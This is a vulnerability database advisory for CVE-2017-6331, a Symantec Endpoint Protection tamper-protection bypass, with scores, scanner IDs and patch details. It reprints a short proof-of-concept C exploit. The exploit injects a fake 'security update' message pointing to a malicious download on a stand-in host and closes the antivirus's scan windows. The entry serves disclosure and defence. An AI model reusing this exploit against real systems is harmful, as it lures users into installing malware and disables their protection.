Symantec Endpoint Protection up to 12.1.x/14.0 Real Time Protection UI access control
| CVSS Meta Temp Score | Current Exploit Price (≈) | CTI Interest Score |
|---|---|---|
| 3.9 | $0-$5k | 0.00 |
Summary
A vulnerability has been found in Symantec Endpoint Protection up to 12.1.x/14.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Real Time Protection. The manipulation leads to access control (UI). This vulnerability is referenced as CVE-2017-6331. The attack can only be performed from a local environment. Furthermore, an exploit is available. It is recommended to apply a patch to fix this issue.
Details
A vulnerability was found in Symantec Endpoint Protection up to 12.1.x/14.0 (Anti-Malware Software) and classified as problematic. This issue affects an unknown part of the component Real Time Protection. The manipulation with an unknown input leads to a access control vulnerability (UI). Using CWE to declare the problem leads to CWE-284. The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Impacted is integrity. The summary by CVE is:
Prior to SEP 14 RU1 Symantec Endpoint Protection product can encounter an issue of Tamper-Protection Bypass, which is a type of attack that bypasses the real time protection for the application that is run on servers and clients.
The bug was discovered 11/06/2017. The weakness was published 11/06/2017 by John Page (hyp3rlinx) as confirmed security advisory (Website). It is possible to read the advisory at symantec.com. The public release has been coordinated with Symantec. The identification of this vulnerability is CVE-2017-6331 since 02/26/2017. Attacking locally is a requirement. A simple authentication is necessary for exploitation. It demands that the victim is doing some kind of user interaction. Technical details are unknown but a public exploit is available. The attack technique deployed by this issue is T1068 according to MITRE ATT&CK. The advisory points out:
The Symantec Endpoint Protection Windows endpoint can encounter an issue of Tamper-Protection Bypass, which is a type of attack that bypasses the real time protection for the application that is run on servers and clients. Tamper Protection protects Symantec processes and internal objects from these attacks that non-Symantec processes such as worms, Trojan horses, viruses, and security risks could make. Note that in this circumstance, the tamper-protection bypass only allows altering a small amount of text in one element of the UI.
A public exploit has been developed by hyp3rlinx and been published 4 days after the advisory. The exploit is available at exploit-db.com. It is declared as proof-of-concept. The vulnerability was handled as a non-public zero-day exploit for at least 469 days. During that time the estimated underground price was around $0-$5k. The vulnerability scanner Nessus provides a plugin with the ID 104459 (Symantec Endpoint Protection Client 12.1.x < 12.1 RU6 MP9 / 14.0.x < 14.0 RU1 Multiple Vulnerabilities (SYM17-011)), which helps to determine the existence of the flaw in a target environment. It is assigned to the family Windows and running in the context l. The commercial vulnerability scanner Qualys is able to test this issue with plugin 370647 (Symantec Endpoint Protection Multiple Security Vulnerabilities (SYM17-011)). The code used by the exploit is:
void main(void){
while(1){
HWND hWnd = FindWindow( NULL, TEXT("Status - Symantec Endpoint Protection"));
if(hWnd!=NULL){
//This injects arbitrary messages to SEP UI.
SetWindowText(hWnd, "*** Important Security Update, Visit: http://PWN3D.com/EVIL.exe download and follow instructions. ***");
//This prevents a user from being able to run AV scans and renders SEP UI useless
//SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0);
}
//HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0);
HWND x = FindWindow(NULL, TEXT("DevViewer"));
if(x!=NULL){
SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0);
}
HWND x2 = FindWindow(NULL, TEXT("DoScan Help"));
SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0);
HWND x3 = FindWindow(NULL, TEXT("Sylink Drop"));
SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0);
HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016"));
if(x!=NULL){
SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0);
}
sleep(1);
}
}Applying the patch 14.0 RU1 is able to eliminate this problem. A possible mitigation has been published even before and not after the disclosure of the vulnerability.
The vulnerability is also documented in the databases at Exploit-DB (43134), Tenable (104459) and SecurityFocus (BID 101502†). Similar entries are available at VDB-109154 and VDB-109155. Be aware that VulDB is the high quality source for vulnerability data.
Product
Type
Vendor
Name
Version
License
Website
- Vendor: https://www.symantec.com/
CPE 2.3
CPE 2.2
CVSSv4
VulDB Vector: 🔍VulDB Reliability: 🔍
CVSSv3
VulDB Meta Base Score: 4.2VulDB Meta Temp Score: 4.2
VulDB Base Score: 2.8
VulDB Temp Score: 2.6
VulDB Vector: 🔍
VulDB Reliability: 🔍
Vendor Base Score (Symantec): 2.8
Vendor Vector (Symantec): 🔍
NVD Base Score: 7.1
NVD Vector: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Vector | Complexity | Authentication | Confidentiality | Integrity | Availability |
|---|---|---|---|---|---|
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Reliability: 🔍
NVD Base Score: 🔍
Exploiting
Name: UIClass: Access control / UI
CWE: CWE-284 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍
Physical: Partially
Local: Yes
Remote: Partially
Availability: 🔍
Access: Public
Status: Proof-of-Concept
Author: hyp3rlinx
Download: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Price Prediction: 🔍
Current Price Estimation: 🔍
| 0-Day | Unlock | Unlock | Unlock | Unlock |
|---|---|---|---|---|
| Today | Unlock | Unlock | Unlock | Unlock |
Nessus ID: 104459
Nessus Name: Symantec Endpoint Protection Client 12.1.x < 12.1 RU6 MP9 / 14.0.x < 14.0 RU1 Multiple Vulnerabilities (SYM17-011)
Nessus File: 🔍
Nessus Risk: 🔍
Nessus Family: 🔍
Nessus Context: 🔍
OpenVAS ID: 53886
OpenVAS Name: Symantec Endpoint Protection Security Bypass Vulnerability (SYM17-011)
OpenVAS File: 🔍
OpenVAS Family: 🔍
Qualys ID: 🔍
Qualys Name: 🔍
Exploit-DB: 🔍
Threat Intelligence
Interest: 🔍Active Actors: 🔍
Active APT Groups: 🔍
Countermeasures
Recommended: PatchStatus: 🔍
Reaction Time: 🔍
0-Day Time: 🔍
Exploit Delay Time: 🔍
Patch: 14.0 RU1
Timeline
07/08/2016 🔍07/14/2016 🔍
02/26/2017 🔍
10/20/2017 🔍
11/06/2017 🔍
11/06/2017 🔍
11/06/2017 🔍
11/06/2017 🔍
11/07/2017 🔍
11/08/2017 🔍
11/10/2017 🔍
11/10/2017 🔍
01/23/2021 🔍
Sources
Vendor: symantec.comAdvisory: symantec.com
Researcher: John Page (hyp3rlinx)
Status: Confirmed
Confirmation: 🔍
Coordinated: 🔍
CVE: CVE-2017-6331 (🔍)
GCVE (CVE): GCVE-0-2017-6331
GCVE (VulDB): GCVE-100-109175
SecurityFocus: 101502 - Symantec Endpoint Protection CVE-2017-6331 Local Security Bypass Vulnerability
SecurityTracker: 1039775
scip Labs: https://www.scip.ch/en/?labs.20161013
See also: 🔍
Entry
Created: 11/07/2017 08:06Updated: 01/23/2021 09:02
Changes: 11/07/2017 08:06 (107), 12/10/2019 16:06 (2), 01/23/2021 09:02 (2)
Complete: 🔍
Cache ID: 216::103
Be aware that VulDB is the high quality source for vulnerability data.
No comments yet. Languages: en.
Please log in to comment.